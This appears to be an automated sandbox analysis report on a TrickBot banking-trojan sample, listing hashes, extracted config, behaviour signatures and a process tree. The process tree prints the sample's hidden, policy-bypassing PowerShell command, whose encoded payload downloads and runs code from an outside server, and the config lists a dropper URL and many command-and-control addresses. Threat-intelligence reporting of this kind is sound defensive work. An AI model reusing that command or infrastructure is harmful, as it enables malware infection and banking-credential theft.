trickbot | 97e2a97f378f9af38427493fb965461310ee42dd8d74725223073b8fd0f77e65

General

Target

32.js
Size

463KB
MD5

8f545d23b3544ed3e79ac481de6d2e35
SHA1

2232a67e54f505fbd1d70ae0e18db1f8ed0b307d
SHA256

97e2a97f378f9af38427493fb965461310ee42dd8d74725223073b8fd0f77e65
SHA512

ef0df34055533efc390798bfe0c3875f0bfb5a975012ff77915e4f64c21e4eaf0abdbdeac4d85c74c73dbac9c6744cf4dbe905dc44d089179969516be804d1be

Score

10^/10

trickbot rob109 banker trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://109.248.201.26/lovemetertok.php

Extracted

Family

trickbot

Version

100018

Botnet

rob109

C2

38.110.103.124:443

185.56.76.28:443

204.138.26.60:443

60.51.47.65:443

74.85.157.139:443

68.69.26.182:443

38.110.103.136:443

38.110.103.18:443

138.34.28.219:443

185.56.76.94:443

217.115.240.248:443

24.162.214.166:443

80.15.2.105:443

154.58.23.192:443

38.110.100.104:443

45.36.99.184:443

185.56.76.108:443

185.56.76.72:443

138.34.28.35:443

97.83.40.67:443

Attributes

autorun
Name:pwgrabb
Name:pwgrabc

ecc_pubkey.base64

Signatures

Trickbot
Developed in 2016, TrickBot is one of the more recent banking Trojans.
trojan banker trickbot
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

10 3676 powershell.exe
11 3676 powershell.exe
Downloads MZ/PE file
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

2044 rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

3676 powershell.exe
3676 powershell.exe
3676 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exewermgr.exe

description pid process

Token: SeDebugPrivilege 3676 powershell.exe
Token: SeDebugPrivilege 3992 wermgr.exe

flow	pid	process
10	3676	powershell.exe
11	3676	powershell.exe

pid	process
2044	rundll32.exe

pid	process
3676	powershell.exe
3676	powershell.exe
3676	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3676	powershell.exe
Token: SeDebugPrivilege	3992	wermgr.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

wscript.execmd.exepowershell.exerundll32.exerundll32.exe

description	pid	process	target process
PID 3992 wrote to memory of 2664	3992	wscript.exe	cmd.exe
PID 3992 wrote to memory of 2664	3992	wscript.exe	cmd.exe
PID 2664 wrote to memory of 3676	2664	cmd.exe	powershell.exe
PID 2664 wrote to memory of 3676	2664	cmd.exe	powershell.exe
PID 3676 wrote to memory of 1380	3676	powershell.exe	rundll32.exe
PID 3676 wrote to memory of 1380	3676	powershell.exe	rundll32.exe
PID 1380 wrote to memory of 2044	1380	rundll32.exe	rundll32.exe
PID 1380 wrote to memory of 2044	1380	rundll32.exe	rundll32.exe
PID 1380 wrote to memory of 2044	1380	rundll32.exe	rundll32.exe
PID 2044 wrote to memory of 512	2044	rundll32.exe	cmd.exe
PID 2044 wrote to memory of 512	2044	rundll32.exe	cmd.exe
PID 2044 wrote to memory of 512	2044	rundll32.exe	cmd.exe
PID 2044 wrote to memory of 3992	2044	rundll32.exe	wermgr.exe
PID 2044 wrote to memory of 3992	2044	rundll32.exe	wermgr.exe
PID 2044 wrote to memory of 3992	2044	rundll32.exe	wermgr.exe
PID 2044 wrote to memory of 3992	2044	rundll32.exe	wermgr.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\32.js
1⤵
- Suspicious use of WriteProcessMemory
PID:3992

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA
2⤵
- Suspicious use of WriteProcessMemory
PID:2664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3676

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\ouFgbCSyBdXRVY.bin,StartW
4⤵
- Suspicious use of WriteProcessMemory
PID:1380

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\ouFgbCSyBdXRVY.bin,StartW
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe
6⤵
PID:512

C:\Windows\system32\wermgr.exe
C:\Windows\system32\wermgr.exe
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3992

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ouFgbCSyBdXRVY.bin
MD5
771904cb1370dbdbf1f21890bb9d813d

SHA1
411391b57853292afcef2c1f511deb269f7ec370

SHA256
2d2b38575d79d53bbb22ef7663a7065a915b7eb37a6dd2e1b1163b59af2bcb92

SHA512
06785438ea8bfeb812395965b0e53dbbadf7c57b97f6e0691d13a2b6f41156bffb23efb30e4237dd7a048060b37da38d4fcfe44bf9126ef299073c94103c3e19

Download Submit
\Users\Admin\AppData\Local\Temp\ouFgbCSyBdXRVY.bin
MD5
771904cb1370dbdbf1f21890bb9d813d

SHA1
411391b57853292afcef2c1f511deb269f7ec370

SHA256
2d2b38575d79d53bbb22ef7663a7065a915b7eb37a6dd2e1b1163b59af2bcb92

SHA512
06785438ea8bfeb812395965b0e53dbbadf7c57b97f6e0691d13a2b6f41156bffb23efb30e4237dd7a048060b37da38d4fcfe44bf9126ef299073c94103c3e19

Download Submit
memory/1380-136-0x0000000000000000-mapping.dmp

Download
memory/2044-149-0x0000000004AE0000-0x0000000004B24000-memory.dmp

Filesize
272KB

Download
memory/2044-150-0x00000000046F0000-0x00000000046F1000-memory.dmp

Filesize
4KB

Download
memory/2044-151-0x0000000004640000-0x00000000046CE000-memory.dmp

Filesize
568KB

Download
memory/2044-148-0x0000000004640000-0x00000000046CE000-memory.dmp

Filesize
568KB

Download
memory/2044-146-0x0000000004AA0000-0x0000000004AD7000-memory.dmp

Filesize
220KB

Download
memory/2044-144-0x0000000004A60000-0x0000000004A99000-memory.dmp

Filesize
228KB

Download
memory/2044-138-0x0000000000000000-mapping.dmp

Download
memory/2044-141-0x00000000046A0000-0x00000000046DB000-memory.dmp

Filesize
236KB

Download
memory/2664-114-0x0000000000000000-mapping.dmp

Download
memory/3676-115-0x0000000000000000-mapping.dmp

Download
memory/3676-121-0x000002E0795A0000-0x000002E0795A1000-memory.dmp

Filesize
4KB

Download
memory/3676-128-0x000002E079750000-0x000002E079751000-memory.dmp

Filesize
4KB

Download
memory/3676-135-0x000002E05EF96000-0x000002E05EF98000-memory.dmp

Filesize
8KB

Download
memory/3676-134-0x000002E05EF93000-0x000002E05EF95000-memory.dmp

Filesize
8KB

Download
memory/3676-133-0x000002E05EF90000-0x000002E05EF92000-memory.dmp

Filesize
8KB

Download
memory/3992-152-0x0000000000000000-mapping.dmp

Download
memory/3992-154-0x000001D9126A0000-0x000001D9126A1000-memory.dmp

Filesize
4KB

Download
memory/3992-153-0x000001D912590000-0x000001D9125B8000-memory.dmp

Filesize
160KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads